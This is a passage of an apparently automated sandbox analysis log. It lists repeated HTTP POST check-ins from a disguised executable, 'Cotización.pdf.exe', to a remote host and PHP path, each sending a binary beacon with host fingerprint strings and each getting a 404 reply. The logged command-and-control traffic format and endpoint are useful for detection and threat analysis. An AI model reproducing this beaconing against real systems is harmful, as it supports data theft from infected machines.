                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ry8KYHEYYYnAYz8YvyrXAyhDB9PvpPr6IErZZqX9xYTXpSinAnEPhtlQToxUepUCTmvGGqFHYwEHTZaWduN7gdozgF8DsIdb6S7NgQcyhA1eVlsmjLVJwRE%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2647e9ec6c2d6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      100192.168.2.349836172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:47.326471090 CEST5955OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:47.346231937 CEST5955OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:47.622714996 CEST5956INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:47 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=MEWqBTizQnqX2Kw0pzq%2BswANXW3b2h3BPWKwILlczIvmbxPMoyCrxvCXcNQMPvQL%2Bow5yEVlSvazYCAYAas1QQSOPUAGNvihwD7nDZcTnvKn9AuEohGEka0%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265c3dbca2bce-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      101192.168.2.349837104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:47.878792048 CEST5956OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:47.901840925 CEST5957OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:48.177568913 CEST5957INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:48 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=JwFg0zBPMaWDPo8CNxrekSfnpnMrq3%2Bwg%2Fu2696bqG%2FWw%2F3k2QJupU3ThWVeivtoXK3dPfmq5Vn2UgnFcGutVaUbpcitPqf6qDAvxJ%2F%2FoA1aElPpBOmebSM%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265c759a94ab6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      102192.168.2.349838104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:48.411433935 CEST5958OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:48.430942059 CEST5959OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:48.671649933 CEST5959INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:48 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jg%2FnJ%2BVgh6gtH9Zr%2FmPP3DMxKaJ%2F80lCrgBIuxocsLDLeaqKCVfdw1GA%2FlNWkc94FSvGWmgcKadpajfBZXVHr0Z7p7mstROLr5Q%2FDwf9BWduEYVCrAdkOw4%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265caaae7062d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      103192.168.2.349839172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:48.918282986 CEST5960OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:48.937271118 CEST5960OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:49.181292057 CEST5961INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:49 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=LJTfvffl%2B%2BGPRGhH0xwjvMXS%2BWSDZP%2FTEmXY3gHgP4EeJirHlVsPGlYYnEmYZzxpctO9WDwwgKdA5OYDjHCvnVN95zZ8n%2ByqYfIK8tJ5%2FUpp8Vgu57tklXM%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265cdcad74e5b-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      104192.168.2.349840172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:49.450254917 CEST5962OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:49.468599081 CEST5962OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:49.704042912 CEST5963INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:49 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GH%2B1Q%2BJedTfJkk8SaF6l7x1E8yScm4TVPOVVCLdzixXUYvJ1swtokwBVMOOZW2nhpB7FkALUBr8ma7JZdf%2F10ACmRrABqobBdp%2BOnPra6YB1JHXiQgWk5i8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265d11c09177a-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      105192.168.2.349841172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:49.943382025 CEST5964OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:49.963247061 CEST5964OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:50.203769922 CEST5965INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:50 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ijSyOw6zOcCvuV6xXQwIZC%2BCR7sBat7xqTMsGNuB2k0smgSFNppUwob9xeqLx6ft1X24PYGqPCDnJrpisD%2FPdHRvBwWRgeNlOJNtZ%2FqAXO9m8K%2BdXbDoEB2t1N1VwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265d43eae4dd6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      106192.168.2.349842104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:50.459167004 CEST5966OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:50.477102995 CEST5966OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:50.748295069 CEST5967INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:50 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jebDRTcVDnKdlk9iTyHgRl%2BxQ%2FNCLaL7d0QDS8Nt4rz3q1CIcc8OpCFrDe7wQbeRHM%2FzYSr9P4z6p06emm1Bz7t7y6%2BRt2m%2BD%2BuYag5uLgFbJEHIzyI0FwU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265d76b4e4a9d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      107192.168.2.349843104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:51.000293970 CEST5968OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:51.019896030 CEST5968OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:51.277334929 CEST5969INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:51 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=B%2FibFEE2Mu1O%2BKL4TkCWMZTozZs0kKMc5T%2FdTpkUq2IfKBp0fCtA4O7BQ1IWTV92BOJbYbyEcCN2Xwgd0uJ7ETpjHIVe0KbdKFfOrZBDECNHnqL0AjJPKV4%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265dadeb263a1-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      108192.168.2.349844172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:51.527108908 CEST5969OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:51.545094013 CEST5970OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:51.798388958 CEST5970INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:51 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kXXP%2B5zT1AkBTipsURQl%2FNoiBWC1K6ia42mdc6N2IvuhlsKgmjjr0gmCrlVI0lgMCEqiDZcyRAvBN1drskx47VOxZPVPG0a%2FhePut6g2z8cImlJj7MXprazkJpc8TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265de1b3ddfcf-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      109192.168.2.349845172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:52.047049046 CEST5971OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:52.066953897 CEST5972OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:52.333260059 CEST5972INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:52 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=02ZjIDUpXr5SSsi30RuIQoWFztYCITY787K52ceZWLmo60cb0QKSpqgW9OviauCch9Xl5A0bAo01Yv2zLIdN5%2FZqIe%2BDO5e5d%2Be2gzsB%2BzfRSScCNlcZUWU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265e169264a56-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      11192.168.2.349736172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:55.996022940 CEST1388OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:56.016937017 CEST1388OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:56.263892889 CEST1389INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:56 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=D7uBYixmTPUjuFyyrSQl%2F9RHHfx6EFSFNpqIH9VxkRkRqWI%2Fb1uK4mTJSKwCAqYhteDJCwDlCynLrAM1ugfNiXJ7xoFJzt9sMVDkcroek7lTntA5MOgvIEc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264830c3d4dfa-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      110192.168.2.349846104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:52.581899881 CEST5973OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:52.600215912 CEST5973OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:52.837876081 CEST5974INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:52 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HmPY6HM5tDeG3o4DGuePHjVwezbqYqleOMHj1P26AVplkm58o03xyX8uQWX2wBxSBiSDqfBZcw8kD0q0PZPVJbsyRaaRJSGDfqpCthlftFBNhvEKrjZDnws%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265e4bae14e98-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      111192.168.2.349847172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:53.082180023 CEST5975OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:53.101999044 CEST5975OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:53.379092932 CEST5976INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ys3zpcQskdw1Rv2x0zIC9uQxFyDt1GQDG6KyZ%2BxXhJCU57x5Jf%2B2%2FBNJb%2B72xUZ3cYKTmjG%2BZx8iUM%2BVLx%2BzRpIBT%2FAjj86pyDIFLNtoZD%2Bquct20eqvO0z7FNT2rQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265e7db21c2b8-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      112192.168.2.349848104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:53.609941959 CEST5977OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:53.627660990 CEST5977OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
